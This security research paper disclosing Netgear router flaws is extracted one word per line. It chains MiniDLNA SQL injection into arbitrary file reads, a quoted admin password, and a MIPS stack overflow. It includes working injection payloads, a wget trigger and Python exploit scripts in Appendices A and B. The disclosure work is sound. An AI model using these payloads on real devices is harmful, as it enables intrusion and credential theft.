Zachary
Cutlip,
Tactical
Network
Solutions
[email protected]
SQL
Injection
to
MIPS
Overflows:
Rooting
SOHO
Routers
Zachary
Cutlip
1
Introduction
In
this
paper
I
will
demonstrate
novel
uses
of
SQL
injection
as
an
attack
vector
to
exploit
otherwise
unexposed
vulnerabilities.
Additionally,
I
detail
a
number
of
zero-‐day
remote
vulnerabilities
found
in
several
popular
Small
Office/Home
Office
(SOHO)
wireless
routers
manufactured
by
Netgear.
In
the
course
of
explaining
the
vulnerabilities,
I
demonstrate
how
to
pivot
off
of
a
SQL
injection
in
order
to
achieve
fully
privileged
remote
system
access
via
buffer
overflow
attack.
I
also
make
the
case
that
the
oft-‐forgotten
SOHO
router
is
among
the
most
valuable
targets
on
a
home
or
corporate
network.
Traditionally,
SQL
injection
attacks
are
regarded
as
a
means
of
obtaining
privileged
access
to
data
that
would
otherwise
be
inaccessible.
An
attack
against
a
database
that
contains
no
valuable
or
sensitive
data
is
easy
to
disregard.
This
is
especially
true
in
the
case
that
the
data
is
temporary
and
application-‐
generated.
I
will
show
that
such
vulnerabilities
may
actually
present
new
exploitation
opportunities.
Often,
an
application
developer
assumes
that
only
his
or
her
application
will
ever
make
modifications
to
the
database
in
question.
As
a
result,
the
application
may
fail
to
properly
validate
results
from
database
queries,
since
it
is
assumed
that
all
query
results
may
be
trusted.
If
the
database
is
vulnerable
to
tampering,
it
is
then
possible
violate
the
application
developer’s
assumption
of
well-‐formed
data,
sometimes
to
interesting
effect.
I
will
demonstrate
three
vulnerabilities
in
the
target
device.
First
is
a
SQL
injection
vulnerability
that
is
trivially
exploitable,
but
yields
little
in
the
way
of
privileged
access.
The
second
and
third
vulnerabilities
yield
successively
greater
access,
but
are
less
exposed.
I
will
show
how
we
can
use
the
first
as
an
attack
vector
in
order
to
effectively
exploit
the
second
and
third
vulnerabilities.
The
goals
for
this
paper
are:
•
Introduce
novel
application
of
SQL
injection
in
order
to
exploit
a
buffer
overflow
and
gain
remote
access.
•
Describe
zero-‐day
vulnerabilities
found
in
Netgear
SOHO
routers
•
Guide
the
reader
step-‐by-‐step
through
the
investigative
process,
so
that
he
or
she
may
produce
the
same
results
independently
•
Provide
the
reader
with
a
set
of
useful
investigative
techniques
applicable
to
SOHO
routers
and
embedded
devices
in
general
SQL
Injection
to
MIPS
Overflows:
Rooting
SOHO
Routers
Zachary
Cutlip
2
Target Device: Netgear WNDR3700v3
In
order
to
demonstrate
real
world
cases
in
which
application
vulnerabilities
may
be
exploited
by
first
compromising
the
integrity
of
a
low-‐value
database,
I
will
demonstrate
security
analysis
of
a
popular
wireless
router.
The
device
in
question
is
the
Netgear
wireless
router
WNDR3700
version
3.1
The
WNDR3700’s
robust
feature
set
makes
it
very
popular.
It
is
this
enhanced
capability
set
that
also
makes
it
an
attractive
subject
of
security
analysis.
Specifically,
it
is
this
device’s
media
storage
and
serving
capability
that
is
the
subject
of
this
paper’s
research.
In
addition
to
traditional
wireless
networking
and
Internet
gateway
capability,
the
WNDR3700
functions
as
a
DLNA
server.
DLNA
stands
for
Digital
Living
Network
Alliance
and
refers
to
set
of
specifications
that
define,
among
other
things,
mechanisms
by
which
music
and
movie
files
may
be
served
over
a
local
network
and
played
back
by
DLNA-‐capable
devices.
As
I
will
show,
this
device’s
DLNA
functionality
exposes
critical
vulnerabilities.
SOHO Router as High Value Target
The
SOHO
router,
as
class
of
device,
is
generally
inexpensive
and
sees
little
direct
user
interaction.
It
functions
discreetly
and
reliably
on
a
shelf
and
is
often
forgotten
past
its
initial
setup
and
configuration.
However,
the
significance
of
this
device’s
role
on
the
network
cannot
be
overstated.
As
a
gateway
device,
it
is
often
entrusted
with
all
of
its
users’
Internet-‐bound
traffic.
The
vulnerabilities
I
discuss
in
this
paper
offer
an
attacker
a
privileged
vantage
point
on
a
home
or
corporate
network.
A
compromise
of
such
a
device
can
grant
to
the
attacker
access
to
all
of
a
network’s
inbound
and
outbound
communication.
Further,
successful
compromise
of
the
gateway
device
opens
the
opportunity
to
attack
internal
systems
that
previously
were
not
exposed.
Analyzing the Target Device
Inspection
of
the
target
device’s
firmware
is
an
excellent
place
to
begin
analysis.
There
is
a
wealth
of
intelligence
to
be
found
in
the
manufacturer’s
firmware
update
file.
Although
the
process
of
unpacking
and
analyzing
firmware
is
beyond
the
scope
of
this
paper,
Craig
Heffner
has
provided
on
his
website2
an
excellent
explanation
of
the
tools
and
techniques
involved.
Having
downloaded3
and
unpacked
the
firmware
update
file,
we
can
now
verify
that
this
device
runs
a
Linux-‐based
operating
system:
1
At
the
time
of
writing,
this
device
is
widely
available
online
for
approximately
USD$100.
2
http://www.devttys0.com/2011/05/reverse-‐engineering-‐firmware-‐linksys-‐wag120n/
3
http://support.netgear.com/app/products/model/a_id/19278
SQL
Injection
to
MIPS
Overflows:
Rooting
SOHO
Routers
Zachary
Cutlip
3
Figure 1 Verifying the Linux kernel in the vendor’s firmware update file.
Any
device
that
runs
Linux
is
an
ideal
candidate
for
analysis,
since
there
are
ample
tools
and
techniques
readily
available
for
working
with
Linux
systems.
Often,
simply
having
a
copy
of
the
firmware
is
sufficient
for
discovering
vulnerabilities
and
developing
working
exploits
against
them.
However,
being
able
to
interact
directly
with
the
hardware
can
aid
analysis
greatly.
In
the
case
of
the
WNDR3700,
it
is
easy
to
modify
its
internals
by
attaching
a
UART
header
so
we
can
interact
with
the
running
device
via
a
serial
console
application
such
as
minicom.
I
won’t
detail
the
specifics
of
hardware
modification
in
this
paper.
This
is
adequately
addressed
on
various
hobbyist
websites
and
forums.
However,
terminal
access
to
the
device
is
essential
for
the
investigations
I
describe.
In
addition
to
the
serial
port,
the
WNDR3700v3
has
another
feature
that
aids
analysis:
a
USB
port.
This
device
is
intended
for
use
as
a
Network
Attached
Storage
(NAS)
device,
and
will
automatically
mount
a
USB
storage
device
when
it
is
plugged
in.
This
makes
it
easy
to
load
tools
onto
the
device
for
dynamic
analysis.
Also,
system
files
such
as
executables,
libraries,
configuration
files,
and
database
files
may
be
copied
from
the
device
for
offline
analysis.
Although
the
DLNA
server
functionality
requires
external
USB
storage
in
order
to
serve
digital
media,
the
vulnerabilities
detailed
in
this
paper
do
not.
The
vulnerable
DLNA
server
functionality
remains
running
on
the
device
even
if
the
user
does
not
connect
a
USB
storage
device.
SQL
Injection
to
MIPS
Overflows:
Rooting
SOHO
Routers
Zachary
Cutlip
4
Target Application: MiniDLNA server
The
application
included
in
the
WNDR3700’s
firmware
providing
DLNA
capabilities
is
called
‘minidlna.exe’.
The
minidlna
executable
can
be
found
in
the
unpacked
firmware:
Figure 2 Locating minidlna.exe in upacked firmware.
Running
the
‘strings’
command
on
the
minidlna.exe
executable,
grepping
for
‘Version’
reveals
that
this
build
is
version
1.0.18:
Figure 3 Verifying version of MiniDLNA found in vendor’s firmware update file.
A
Google
search
reveals
that
Netgear
has
released
MiniDLNA
as
an
open
source
project
on
Sourceforge.com.
This
is
potentially
a
lucky
find.
Source
code
significantly
reduces
time
and
effort
involved
in
analyzing
the
target
application.
Analyzing MiniDLNA
Vulnerability 1: SQL Injection
Having
downloaded
and
unpacked
the
corresponding
source
code
for
MiniDLNA
version
1.0.18,
there
are
easy
indicators
to
look
for
which
may
point
to
vulnerabilities.
A
grep
search
yields
valuable
evidence:
Figure 4 A search for candidates for SQL injection vulnerability.
Looking
for
potential
SQL
injections,
we
grep
for
SQL
queries
constructed
using
improperly
escaped
strings
(the
‘%s’
format
character).
There
are
21
lines
matching
this
pattern
in
the
MiniDLNA
source.
The
ones
shown
above
are
representative.
In
addition
to
being
potential
SQL
injections,
there
are
also
possibly
buffer
overflows,
due
to
the
use
of
an
unbounded
sprintf().
Let’s
look
at
the
upnphttp.c,
line
1174,
where
ALBUM_ART
is
queried:
SQL
Injection
to
MIPS
Overflows:
Rooting
SOHO
Routers
Zachary
Cutlip
5
Figure 5 Location in MiniDLNA source code where album art is queried by ID field.
We
see
that
‘sql_buf’
is
a
256-‐byte
character
array
placed
on
the
stack.
There
is
an
unbounded
sprintf()
into
it.
This
may
be
a
buffer
overflow.
A
grep
through
the
source
reveals
there’s
only
a
single
call-‐site
for
SendResp_albumArt().
Let’s
look
at
where
it’s
called
from
upnphttp.c:
SQL
Injection
to
MIPS
Overflows:
Rooting
SOHO
Routers
Zachary
Cutlip
6
Figure 6 Analyzing call-site of SendResp_albumArt(). This appears to be no buffer overflow candidate, but may be a
SQL injection candidate.
We
can
see
the
caller,
ProcessHttpQuery_unpnphttp(),
sends
a
string
512
(or
fewer)
bytes
in
length
to
SendResp_albumArt().
Unfortunately,
since
there
is
a
1500-‐byte
character
array
on
the
stack
in
SendResp_albumArt()
above
sql_buf,
we
cannot
overwrite
the
saved
return
address
with
an
overflow.
Nonetheless,
this
seems
to
be
an
ideal
candidate
for
SQL
injection.
If
there
is
a
dash
character
in
the
requested
‘object’,
the
dash
and
everything
after
is
trimmed.
What
remains
of
the
‘object’
string
is
transformed
into
a
SQL
query.
It
isn’t
safe
to
assume
that
the
source
code
Netgear
posted
to
SourceForge
matches
the
shipping
binary
perfectly.
A
quick
look
in
IDA
Pro
at
the
minidlna.exe
executable
copied
from
the
target
system
can
verify
that
the
same
bug
exists
on
the
shipping
device.
SQL
Injection
to
MIPS
Overflows:
Rooting
SOHO
Routers
Zachary
Cutlip
7
Figure 7 Verifying the presence of a SQL injection bug in the shipping executable.
We
can
copy
the
SQLite
database
from
the
running
device
to
analyze
its
contents
and
schema.
Figure 8 Verifying the schema of the ALBUM_ART table.
The
schema
defines
the
ALBUM_ART
table
as
a
primary
key
and
a
text
field
called
‘PATH’.
If
the
SQL
injection
works,
we
should
be
able
to
forge
an
ALBUM_ART
record
by
inserting
bogus
integer
and
string
values
into
that
table.
Analysis
of
the
source
code
shows
that
the
DLNA
client
device
retrieves
album
art
from
the
HTTP
URL
path
‘/AlbumArt/’,
followed
by
the
unique
ID
of
the
album
art’s
database
entry.
We
can
verify
this
with
a
web
browser:
SQL
Injection
to
MIPS
Overflows:
Rooting
SOHO
Routers
Zachary
Cutlip
8
Figure 9 Verifying album art HTTP URL in a web browser.
We
can
easily
test
our
SQL
injection
vulnerability
using
the
wget
command,
and
then
retrieving
the
database
from
the
running
device
for
analysis.
We
must
make
sure
the
GET
request
isn’t
truncated
or
tokenized
as
a
result
of
spaces
in
the
injected
SQL
command.
It
is
important
for
the
complete
SQL
syntax
to
arrive
intact
and
be
interpreted
correctly
by
SQLite.
This
is
easily
resolved-‐-‐SQLite
allows
the
use
of
C-‐style
comment
to
separate
keywords,
which
we
can
substitute
for
spaces:
INSERT/**/into/**/ALBUM_ART(ID,PATH)/**/VALUES(‘31337’,‘pwned’);
Before
testing
this
injection,
it
is
worth
noting
that
plugging
in
a
FAT-‐formatted
USB
disk
causes
MiniDLNA
to
create
the
SQLite
database
on
the
disk,
rather
than
on
the
target’s
temporary
file
system.
Later,
we
will
see
a
way
to
extract
the
database
from
the
running
system
over
the
network,
but
for
now,
we
will
ensure
a
USB
disk
is
plugged
in,
so
we
can
power
off
the
device,
connect
the
disk
to
our
own
system,
and
analyze
the
resulting
database
offline.
Append
the
injected
command
after
the
requested
album’s
unique
ID:
Figure 10 A trivially exploitable SQL injection vulnerability.
The
good
news
is
we
have
a
working,
trivially
exploitable
SQL
injection!
We
have
created
an
ALBUM_ART
record
consisting
of
31337
and
‘pwned’.
The
bad
news
is
this
exploit,
on
its
own,
is
of
little
value.
This
database
contains
metadata
about
the
user’s
music
and
videos,
but
no
real
sensitive
or
valuable
information.
In
fact,
if
the
database
is
destroyed,
it
is
regenerated
the
next
time
MiniDLNA
indexes
the
user’s
media
files.
No
valuable
information
can
be
compromised
from
this
exploit
alone.
SQL
Injection
to
MIPS
Overflows:
Rooting
SOHO
Routers
Zachary
Cutlip
9
What
we
will
look
at
next
is
how
the
MiniDLNA
application
uses
results
of
its
database
queries.
We
will
see
how
assumptions
about
the
integrity
of
query
results
create
the
opportunity
for
more
significant
security
vulnerabilities.
Vulnerability 2: Arbitrary File Extraction
By
analyzing
the
contents
of
MiniDLNA’s
populated
database...
Figure 11 Analyzing the PATH field of an ALBUM_ART record.
...as
well
the
source
code
for
the
SendResp_albumArt()
function...
Figure 12 The SendResp_albumArt() function appears to send any file on the system that the query result points to.
...we
can
make
an
interesting
observation.
It
appears
MiniDLNA
serves
up
whatever
file
is
pointed
to
by
the
PATH
value
from
the
query
result.
SQL
Injection
to
MIPS
Overflows:
Rooting
SOHO
Routers
Zachary
Cutlip
10
What
makes
this
even
more
interesting
is
that
MiniDLNA,
like
all
processes
on
the
device,
is
running
as
the
root
user.
It
is
not
prevented
from
accessing
any
arbitrary
file
from
the
system.
We
can
verify
this
by
injecting
the
following
query:
INSERT/**/into/**/ALBUM_ART(ID,PATH)/**/VALUES(‘31337’,‘/etc/passwd’);
We
test
this
with
wget:
Figure 13 A SQL injection allows us to wget arbitrary files via HTTP.
With
that,
we
have
vulnerability
number
two:
arbitrary
file
extraction!
We
have
used
the
original
SQL
injection
from
before
in
order
to
exploit
a
second
vulnerability-‐-‐the
MiniDLNA
application
fails
to
sanitize
the
‘path’
result
from
its
album
art
database
query.
This
is
a
useful
attack
against
the
device.
First,
the
passwd
file
seen
in
the
above
example
contains
the
password
for
the
‘admin’
user
account.
The
Samba
file
sharing
service
creates
this
file
whenever
the
user
connects
a
USB
storage
device,
even
though
the
user
has
not
enabled
sharing
on
the
WNDR3700’s
configuration
page.
Further,
the
device
does
not
support
creation
of
accounts
and
passwords
for
file
sharing
that
are
separate
from
the
system
configuration
account.
The
password
shown
above,
‘qw12QW!@’
enables
complete
access
to
the
device’s
configuration
web
interface.
SQL
Injection
to
MIPS
Overflows:
Rooting
SOHO
Routers
Zachary
Cutlip
11
Secondly,
the
ability
to
quickly
and
easily
extract
arbitrary
files
from
the
running
system
makes
analysis
easier
during
the
development
of
our
next
exploit.
We
can
even
use
SQL
injection
to
retrieve
the
database
file
from
the
live
system.
This
will
make
it
more
convenient
to
analyze
the
results
of
our
various
SQL
injections.
Appendix
A
contains
a
program
that
automates
this
exploit.
Vulnerability 3: Remote Code Execution
Arbitrary
file
extraction
yields
greater
access
than
before,
but
ideally
we
will
find
a
way
to
execute
arbitrary
code,
hopefully
enabling
fully
privileged
system
access.
The
most
likely
attack
vector
is
a
buffer
overflow.
With
luck
we
can
find
an
unbounded
write
to
a
buffer
declared
on
the
stack.
We
start
our
quest
for
overflow
candidates
by
searching
for
low
hanging
fruit.
A
grep
through
the
source
code
for
dangerous
string-‐handling
functions
is
a
good
place
to
begin.
Figure 14 A search through MiniDLNA’s source code for dangerous string functions yields many candidates.
Searching
for
strcat(),
sprintf(),
and
strcpy()
function
calls
returns
265
lines.
It
looks
like
there
are
plenty
of
opportunities
to
overflow
a
buffer.
Let’s
have
a
look
at
upnpsoap.c,
line
846
SQL
Injection
to
MIPS
Overflows:
Rooting
SOHO
Routers
Zachary
Cutlip
12
Figure 15 A buffer overflow candidate in MiniDLNA’s SQLite callback() function.
This
is
an
intriguing
bug
for
a
couple
of
reasons.
First,
this
sprintf()
is
near
the
end
of
an
exceptionally
long
function.
That
is
important
because
there
are
many
function
arguments
and
local
variables
on
the
stack.
If
an
overflow
overwrites
the
stack
too
early
in
the
function,
there
are
many
hazards
that
would
likely
crash
the
program
before
we
successfully
intercept
the
function’s
return.
This
bug
is
also
interesting
because
callback()
is
the
function
passed
to
sqlite3_exec()
to
process
the
query
results.
As
seen
at
line
956
of
upnpsoap.c,
the
query
whose
results
are
sent
to
callback()
is:
Figure 16 The SQL query whose results are processed by MiniDLNA’s callback() function.
Let’s
look
at
the
schema
for
the
DETAILS
table.
SQL
Injection
to
MIPS
Overflows:
Rooting
SOHO
Routers
Zachary
Cutlip
13
Figure 17 The schema of the DETAILS table. ALBUM_ART is an integer.
The
schema
shows
that
ALBUM_ART
is
an
integer,
but
the
sprintf()
in
question
is
writing
the
returned
album
art
ID
into
the
512-‐byte
str_buf
as
a
string.
A
couple
things
are
worth
noting.
First,
SQLite
uses
“type
affinity4”
to
convert
a
string
to
a
field’s
numeric
type.
It
does
this
only
if
the
string
has
a
numeric
representation.
For
example,
the
string
“1234”
will
be
stored
as
the
integer
1,234
in
an
integer
field,
but
“1234WXYZ”
will
be
stored
as
a
string.
Further,
SQLite
returns
results
from
queries
on
integer
fields
as
strings.
Second,
the
program
attempts
to
“validate”
the
string
returned
by
SQLite
using
the
atoi()
function.
However,
this
test
only
verifies
that
at
least
the
first
character
of
the
string
is
a
number
and
more
specifically,
a
number
other
than
zero.
The
rest
of
the
string,
starting
with
the
first
non-‐number,
is
ignored.5
The
implication
is
that
arbitrary
data
may
be
returned
from
the
SQL
query
and
subsequently
written
into
str_buf,
even
though
ALBUM_ART
is
specified
as
an
integer
in
the
database’s
schema.
Perhaps
the
developer
assumes
album_art
will
be
a
string
representation
of
an
integer,
and
therefore
of
limited
length.
Next,
by
violating
this
assumption,
we
will
have
an
exploitable
buffer
overflow.
Ordinarily
this
particular
bug
is
difficult
or
impossible
to
exploit,
as
its
input
comes
from
a
database,
not
from
user
input
or
a
network
connection.
There
is
no
reason
that
the
database,
which
is
not
user
facing,
should
contain
anything
that
the
application
didn’t
put
there
itself.
Fortunately
for
us,
we
have
previously
discovered
a
trivially
exploitable
SQL
injection
that
gives
us
unfettered
access
to
the
database.
Thus,
we
can
put
anything
there
we
want.
To
be
sure
this
bug
is
present
in
the
shipping
executable,
we
can
go
back
to
IDA
Pro
for
a
quick
look
inside
the
callback()
function.
4
http://www.sqlite.org/faq.html#q3
5
http://kernel.org/doc/man-‐pages/online/pages/man3/atoi.3.html
SQL
Injection
to
MIPS
Overflows:
Rooting
SOHO
Routers
Zachary
Cutlip
14
Figure 18 Verifying the presence of the buffer overflow candidate in the shipping minidlna.exe executable.
Disassembly
in
IDA
suggests
that
the
target’s
copy
of
MiniDLNA
is
vulnerable
to
an
ALBUM_ART
buffer
overflow.
In
order
to
verify
exploitability
we
need
to
have
data
that
we
control
loaded
into
the
CPU’s
program
counter.
We
can
test
this
by
first
staging
records
in
the
OBJECTS
and
DETAILS
tables
that
will
satisfy
the
left
join
query
described
earlier.
Then
we
will
stage
a
sufficiently
long
string
in
the
database
to
overflow
the
buffer
and
overwrite
the
function’s
saved
return
address.
We
can
set
up
the
appropriate
records
with
the
following
SQL
commands:
INSERT/**/into/**/DETAILS(ID,SIZE,TITLE,ARTIST,ALBUM,TRACK,DLNA_PN,MIME,
ALBUM_ART,DISC)
/**/VALUES("31337”,”PWNED”,"PWNED","PWNED","PWNED","PWNED","PWNED",
"PWNED",”1","PWNED");
INSERT/**/into/**/OBJECTS(OBJECT_ID,PARENT_ID,CLASS,DETAIL_ID)/**/
VALUES("PWNED","PWNED","container","31337");
This
will
create
two
records
that
are
related
via
a
DETAILS.ID
and
OBJECTS.DETAIL_ID
of
‘31337’.
It
is
also
important
to
note
that
the
OBJECTS.ID
value
is
‘PWNED’
and
that
the
ALBUM_ART
value
is
1.
When
constructing
the
string
value
in
DETAILS.ALBUM_ART,
we
ensure
it
passes
the
atoi()
check
by
starting
it
with
the
character
‘1’.
We
need
to
build
up
a
long
string
in
our
record’s
ALBUM_ART
field
of
the
DETAILS
table.
Recall
that
we
will
be
exploiting
the
SendResp_albumArt()
function,
and
the
string
passed
into
it
is
not
arbitrarily
long.
In
fact,
it
is
just
over
500
bytes
at
most.
The
‘object’
string
consists
of
the
requested
object
path,
e.g.,
‘/AlbumArt/1-18.jpg’
plus
the
overhead
of
the
injected
SQL
syntax.
Further,
the
SQL
query
gets
written
into
a
buffer
that
is
256
(Listing
4)
bytes
in
size,
even
though
the
‘object’
string
can
be
as
long
as
500
bytes.
This
clearly
is
a
bug,
but
it’s
not
the
bug
we’re
attempting
to
exploit.
It
is
a
good
idea
to
keep
the
value
that
we’re
injecting
into
the
ALBUM_ART
field
to
a
safe
length
of
128
bytes.
How
can
we
overflow
a
buffer
512
bytes
in
length
by
enough
excess
to
successfully
overwrite
the
return
address
saved
at
the
top
of
the
stack
frame?
Using
SQLite’s
concatenation
operator,
‘||’,
we
can
build
the
excessively
long
string
in
multiple
SQL
injection
passes,
and
keep
appending
more
data
to
the
previous.
For
example:
UPDATE/**/DETAILS/**/set/**/ALBUM_ART=ALBUM_ART||“AAAA”/**/where/**/ID="3";'
SQL
Injection
to
MIPS
Overflows:
Rooting
SOHO
Routers
Zachary
Cutlip
15
Appendix
B
is
a
listing
of
a
Python
script
that
will
insert
our
long
test
string
into
the
target’s
database.
In
order
to
trigger
the
buffer
overflow,
the
client
must
send
a
proper
SOAP
request
to
MiniDLNA
such
that
staged
database
records
are
queried
and
the
results
processed
by
the
vulnerable
callback()
function.
SQL
Injection
to
MIPS
Overflows:
Rooting
SOHO
Routers
Zachary
Cutlip
16
Appendix
C
is
a
listing
of
a
Python
script
that
will
generate
a
complete
DLNA
discovery
and
conversation.
We
can
use
it
to
capture
the
key
SOAP
request
between
client
and
server
using
Wireshark
and
capture
it
for
playback.
Figure 19 Isolating the SOAP request that causes our staged record to be queried.
SQL
Injection
to
MIPS
Overflows:
Rooting
SOHO
Routers
Zachary
Cutlip
17
Appendix
D
lists
the
SOAP
request
XML
document
that
will
query
the
‘PWNED’
object
ID,
thus
triggering
the
exploit.
Having
staged
the
buffer
overflow
in
the
database,
we
can
trigger
it
by
sending
the
captured
SOAP
request
using
the
following
wget
command:
$ wget http://10.10.10.1:8200/ctl/ContentDir --header="Host: 10.10.10.1" \
--header=\
'SOAPACTION: "urn:schemas-upnp-org:service:ContentDirectory:1#Browse"' \
--header='"content-type: text/xml ;charset="utf-8"' \
--header="connection: close" --post-file=./soaprequest.xml
Using
a
USB
disk,
we
can
load
a
gdbserver
cross-‐compiled6
for
little
endian
MIPS
onto
the
live
device
and
attach
to
the
running
minidlna.exe
process.
In
order
to
remotely
debug
we
will
need
to
use
a
gdb
compiled
for
our
own
machine’s
host
architecture
and
the
little
endian
MIPS
target
architecture.
When
sending
the
SOAP
request,
we
can
see
gdb
catch
the
crash
and
that
our
data
lands
in
the
program
counter:
Figure 20 Crashing minidlna.exe with control PC register and all S registers.
We
now
have
control
of
the
program
counter,
and
by
extension,
the
program’s
flow
of
execution.
Further,
we
have
control
over
all
of
the
S-‐registers!
This
makes
things
easier
as
we
develop
our
exploit.
We
overflowed
the
target
buffer
with
approximately
640
bytes
of
data.
If
we
rerun
the
program
with
a
much
larger
overflow,
say
over
2500
bytes,
we
will
be
able
to
see
how
much
of
the
stack
we
can
control.
6
Cross-‐compilation
is
beyond
the
scope
of
this
paper
and
is
left
as
an
exercise
for
the
reader.
SQL
Injection
to
MIPS
Overflows:
Rooting
SOHO
Routers
Zachary
Cutlip
18
We
are
able
to
view
the
state
of
the
stack
and
the
time
of
crash
in
gdb.
The
figure
below
shows
that
we
can
control
an
arbitrary
amount
of
the
stack
space.
Our
longer
overflow
string
does
not
appear
to
get
truncated.
This
gives
plenty
of
room
to
build
a
ROP7
chain
and
to
stage
a
payload.
We
can
use
the
ROP
exploitation
technique
to
locate
a
stack
address
and
return
into
our
code
there.
A
working
exploit
buffer
is
provided
in
Appendix
E.
It
includes
a
reverse
TCP
connect-‐back
shell
that
connects
back
to
the
IP
address
10.10.10.10,
port
31337.
7
Return
Oriented
Programming,
ROP,
is
an
exploitation
technique
by
which
the
attacker
causes
the
compromised
program
to
execute
existing
instructions
that
are
part
of
the
program
or
its
libraries,
rather
than
executing
buffer
overflow
data
directly.
http://cseweb.ucsd.edu/~hovav/talks/blackhat08.html
SQL
Injection
to
MIPS
Overflows:
Rooting
SOHO
Routers
Zachary
Cutlip
19
Figure 21 A view of the stack after overflowing the buffer. We can put a large amount of user-controlled data on the
stack.
SQL
Injection
to
MIPS
Overflows:
Rooting
SOHO
Routers
Zachary
Cutlip
20
Affected Devices
In
researching
these
vulnerabilities,
I
obtained
and
analyzed
the
firmware
for
several
different
Netgear
SOHO
Routers.
For
each
router
I
analyzed
the
two
most
recent
firmware
update
files
available
on
the
vendor’s
support
website.
I
focused
only
on
devices
that
provided
the
DLNA
capability.
Although
the
WNDR3700v3
is
the
only
device
for
which
I
developed
and
tested
the
exploits,
all
the
devices
and
firmware
versions
I
analyzed
appear
to
be
vulnerable
based
on
disassembly
and
static
analysis.
The
following
table
describes
the
devices
and
their
respective
firmware
versions
that
appear
to
be
vulnerable.
Router
Model
Firmware
Version
MiniDLNA
Version
Performed
Static
Analysis
Vulnerable
Developed
Exploits
WNDR3700v3
1.0.0.18
1.0.18
Yes
Yes
Yes
1.0.0.22
1.0.18
Yes
Yes
WNDR3800
1.0.0.18
1.0.19
Yes
Yes
1.0.0.24
1.0.19
Yes8
Yes
WNDR4000
1.0.0.82
1.0.18
Yes
Yes
1.0.0.88
1.0.18
Yes
Yes
WNDR4500
1.0.0.70
1.0.18
Yes
Yes
1.0.1.6
1.0.18
Yes
Yes
In
total,
I
found
eight
separate
firmware
versions
across
four
separate
device
models
that
contain
the
vulnerable
executable.
Conclusion
As
we
have
seen,
there
are
a
number
of
readily
exploitable
vulnerabilities
in
Netgear’s
MiniDLNA
server
and
Netgear’s
wireless
routers.
It
is
easy
pass
over
an
attack
that
yields
little
direct
value,
such
as
the
SQL
injection
shown
earlier.
However,
I
have
clearly
shown
two
practical
and
useful
attacks
that
become
possible
when
combined
with
the
first.
Just
as
significantly,
I
have
presented
analysis
techniques
that
can
be
applied
to
a
variety
of
embedded
devices
for
vulnerability
research
and
exploit
development.
The
first
known
hostile
exploitation
of
a
buffer
overflow
was
by
the
Morris
worm
in
19889.
Yet,
twenty-‐
four
years
later,
buffer
overflows
continue
to
be
as
important
as
ever.
Moreover,
oft-‐overlooked
embedded
devices
such
as
SOHO
routers
are
among
the
most
critical
systems
on
users’
networks.
Vulnerabilities
found
within,
such
as
those
I
have
described
in
this
paper,
have
the
potential
to
expose
a
great
many
users
to
exploitation.
8
The
MD5
digest
for
the
minidlna
executable
unpacked
from
WNDR3800
firmware
version
10.0.0.24
matches
the
digest
from
firmware
10.0.0.18,
so
no
additional
static
analysis
is
required.
9
http://web.archive.org/web/20070520233435/http://world.std.com/~franl/worm.html
SQL
Injection
to
MIPS
Overflows:
Rooting
SOHO
Routers
Zachary
Cutlip
21
Appendix A
The
following
program
exploits
a
SQL
injection
vulnerability
to
enable
convenient
file
extraction
from
the
target.
It
may
be
invoked
as
follows:
$ ./albumartinject.py ‘/etc/passwd’
An
HTTP
URL
is
then
displayed
for
use
with
the
wget
command.
#!/usr/bin/env python
import os
import sys
import urllib,socket,os,httplib
import time
headers={"Host":"10.10.10.1"}
host="10.10.10.1"
album_art_path='/AlbumArt'
inject_id="31337"
port=8200
path_beginning=album_art_path+'/1;'
path_ending='-18.jpg'
class Logging:
WARN=0
INFO=1
DEBUG=2
log_level=2
prefixes=[]
prefixes.append(" [!] ")
prefixes.append(" [+] ")
prefixes.append(" [@] ")
@classmethod
def log_msg(klass,msg,level=INFO):
if klass.log_level>=level:
pref=Logging.prefixes[level]
print pref+msg
def log(msg):
Logging.log_msg(msg)
def log_debug(msg):
Logging.log_msg(msg,Logging.DEBUG)
def log_warn(msg):
Logging.log_msg(msg,Logging.WARN)
def usage():
usage="Usage: %s [FILE]\nInject a database record allowing HTTP access to FILE.\n" %
os.path.basename(sys.argv[0])
print usage
def build_request(query):
request=path_beginning+query+path_ending
return request
def do_request(request):
log_debug("Requesting:")
log_debug(request)
conn=httplib.HTTPConnection(host,port)
conn.request("GET",request,"",headers)
resp=conn.getresponse()
data=resp.read()
conn.close()
return data
try:
desired_file=sys.argv[1]
except IndexError:
usage()
exit(1)
SQL
Injection
to
MIPS
Overflows:
Rooting
SOHO
Routers
Zachary
Cutlip
22
log("Requested file is: "+desired_file)
albumart_insert_query='insert/**/into/**/ALBUM_ART(ID,PATH)'+\
'/**/VALUES("'+inject_id+'","'+desired_file+'");'
albumart_delete_query='delete/**/from/**/ALBUM_ART/**/where/**/ID="'+inject_id+'";'
log("Deleting old record.")
request=build_request(albumart_delete_query)
resp=do_request(request)
log_debug(resp)
log("Injecting ALBUM_ART record.")
request=build_request(albumart_insert_query)
resp=do_request(request)
log_debug(resp)
log("Injection complete.")
log("You may access "+desired_file)
log("via the URL http://%s:%d%s/%s-18.jpg"%(host,port,album_art_path,inject_id))
SQL
Injection
to
MIPS
Overflows:
Rooting
SOHO
Routers
Zachary
Cutlip
23
Appendix B
#!/usr/bin/env python
#AAAAinject.py
# Author: Zachary Cutlip
# [email protected]
# twitter: @zcutlip
#This script injects a buffer overflow into the ALBUM_ART table of
#MiniDLNA's SQLite database. When queried with the proper soap request,
#this buffer overflow demonstrates arbitrary code execution by placing a
#string of user-controlled 'A's in the CPU's program counter. This
#affects MiniDLNA version 1.0.18 as shipped with Netgear WNDR3700 version 3.
import math
import sys
import urllib,socket,os,httplib
import time
from overflow_data import DlnaOverflowBuilder
headers={"Host":"10.10.10.1"}
host="10.10.10.1"
COUNT=8
LEN=128
empty=''
overflow_strings=[]
overflow_strings.append("AA")
overflow_strings.append("A"*LEN)
overflow_strings.append("B"*LEN)
overflow_strings.append("C"*LEN)
overflow_strings.append("D"*LEN)
overflow_strings.append("A"*LEN)
overflow_strings.append("\x10\x21\x76\x15"*(LEN/4))
overflow_strings.append("\x10\x21\x76\x15"*(LEN/4))
overflow_strings.append("D"*LEN)
overflow_strings.append("D"*LEN)
overflow_strings.append("D"*LEN)
path_beginning='/AlbumArt/1;'
path_ending='-18.jpg'
details_insert_query='insert/**/into/**/DETAILS(ID,SIZE,TITLE,ARTIST,ALBUM'+\
',TRACK,DLNA_PN,MIME,ALBUM_ART,DISC)/**/VALUES("31337"'+\
',"PWNED","PWNED","PWNED","PWNED","PWNED","PWNED"'+\
',"PWNED","1","PWNED");'
